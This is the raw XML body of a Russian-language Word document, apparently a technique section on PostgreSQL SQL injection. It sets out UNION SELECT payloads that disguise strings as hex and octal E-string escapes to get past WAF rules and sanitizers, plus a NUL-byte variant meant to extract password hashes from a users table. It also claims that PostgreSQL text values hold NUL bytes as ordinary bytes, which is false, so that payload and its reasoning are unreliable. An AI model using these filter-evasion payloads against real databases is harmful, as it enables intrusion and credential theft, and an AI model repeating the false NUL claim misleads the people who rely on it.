        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE email = E'\x61\x64\x6D\x69\x6E\x40\x63\x6F\x2E\x63\x6F\x6D' --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG лексер видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">E'...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, интерпретирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\xNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как hex-byte (2 hex-цифры). Собирается строка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'admin@co.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. WAF в payload-тексте подстроку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не находил.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — octal-byte literals (альтернатива для escape-strip sanitizer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitizer вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">value.replace(r'\x', '')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> нейтрализует Payload A (превратит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\x61</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61</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Octal-форма (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\NNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ровно 3 octal-цифры) этим фильтром не затрагивается:</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 WHERE email = E'\141\144\155\151\156\100\143\157\56\143\157\155' --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\141</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (octal 141) = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0x61</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\144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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и т.д. </w:t>
      </w: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'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT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FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE email = E'\141\144\155\151\156\100\143\157\56\143\157\155' --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG лексер парсит octal-escape по тому же §4.1.2.2, что и hex. Sanitizer на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не сработал — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в payload нет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — NUL-byte для C-string sanitizer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitizer — C-функция или Python-функция, вызывающая C-библиотеку с обработкой NUL-terminated. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сразу обрывает её view payload-а:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (предполагаемый сценарий — sanitizer вызывает libxml2 для XML-валидации параметра, libxml2 трактует NUL как конец строки):</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E'safe-prefix\x00 IGNORED BY libxml2: ' || password_hash, body FROM users LIMIT 1 --</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'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT id, E'safe-prefix\x00 IGNORED BY libxml2: ' || password_hash, body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM users LIMIT 1 --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ответа клиент получит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'safe-prefix\x00 IGNORED BY libxml2: &lt;hash&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если приложение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">отдаёт</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ответ через C-stack (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исторически имел проблемы с NUL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-возвратах) — клиент увидит только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'safe-prefix'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Но обычный Python-stack (psycopg3, asyncpg) трактует NUL как обычный байт в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">bytes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str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и атакующий получит весь payload.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — лексический префикс. Парсер PG распознаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> перед строковым литералом и включает escape-обработку (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\xNN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\NNN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т.д.).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Конкретные подстроки имени/значения скрыты в hex/octal-кодах: regex по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ничего не находит.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Octal-форма ортогональна hex-форме: фильтр на одну из них не закрывает другую.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NUL-byte (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — единственный синтаксис в PG, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">может</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вставить NUL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напрямую (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">U&amp;'\0000'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> тоже работает, но 3.9.3 шире покрывает другой класс sanitizer-ов).</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E-strings — расширение PG к стандарту (стандарт SQL escape-sequences не поддерживает; PG позволяет либо через E-prefix, либо через GUC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">standard_conforming_strings = off</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Дефолт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">standard_conforming_strings = on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с PG 9.1) — обычные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-литералы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обрабатывают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\NNN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\xNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; нужно явно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">E'...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. До 9.1 (или при ручном </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 backslash-escape был активен и в обычных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что в legacy-коде создавало неожиданные SQL-injections; именно для отказа от этого поведения по умолчанию стандарт был принят за дефолт.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Поддерживаемые escape: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\NNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1-3 octal), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\xNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1-2 hex), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\uNNNN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\UNNNNNNNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Unicode). Документация: §4.1.2.2.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NUL-byte (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) хранится в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как обычный байт, потому что PG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 это TOASTed varlen-структура с длиной, не C-string. Все операции над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(substr, length, ||) корректно работают с NUL внутри. Только некоторые C-API libraries обрабатывают возвращаемые значения через NUL-terminated path.</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8.0+ (все поддерживаемые)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
